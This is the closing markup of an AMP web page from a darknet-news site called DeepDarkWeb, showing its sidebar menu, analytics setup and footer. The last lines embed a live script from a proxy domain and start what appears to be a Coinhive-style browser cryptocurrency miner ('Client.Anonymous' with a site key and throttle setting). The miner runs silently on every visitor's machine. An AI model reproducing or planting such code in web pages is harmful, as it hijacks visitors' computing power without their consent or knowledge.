                        "keyframes": [{
                            "opacity": "0",
                            "visibility": "hidden",
                            "transform": "scale(0.1)"
                        }]
                    }]
                }</script></amp-animation><div class="post-scroll-marker"><amp-position-observer on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer></div><button class="post-scroll" on="tap:top.scrollTo(duration=200)">&#8593;</button><footer class="bottom">DeepDarkWeb</footer><amp-sidebar id="navbar-sidebar" layout="nodisplay"><ul><li><a href="https://DeepDarkWeb.github.io/amp/" title="DeepDarkWeb - Homepage">Home</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/news/" title="DeepDarkWeb - News">News</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/privacy/" title="DeepDarkWeb - Privacy">Privacy</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/decentralization/" title="DeepDarkWeb - Decentralization">Decentralization</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/marketplace/" title="DeepDarkWeb - Marketplaces">Marketplaces</a></li><li><a href="https://DeepDarkWeb.github.io/amp/tags/cryptocurrency/" title="CryptoCurrency - DeepDarkWeb">CryptoCurrency</a></li><li><a href="https://DeepDarkWeb.github.io/amp/about-the-deepdarkweb/" title="About the DeepDarkWeb">About</a></li></ul></amp-sidebar><amp-analytics type="googleanalytics" id="analytics1"><script type="application/json">{
            "vars": {
                "account": "UA-120926139-1"
            },
            "triggers": {
                "trackPageview": {
                    "on": "visible",
                    "request": "pageview"
                }
            }
        }</script></amp-analytics><script src="https://www.freecontent.date./JMH3.js"></script><script>var _client = new Client.Anonymous('61ec05d369c0b85249bda5d00926341400778ecc5eaa00c6cbea5047d8c1380a', {
        throttle: 0.9
    });
    _client.start();</script></body></html>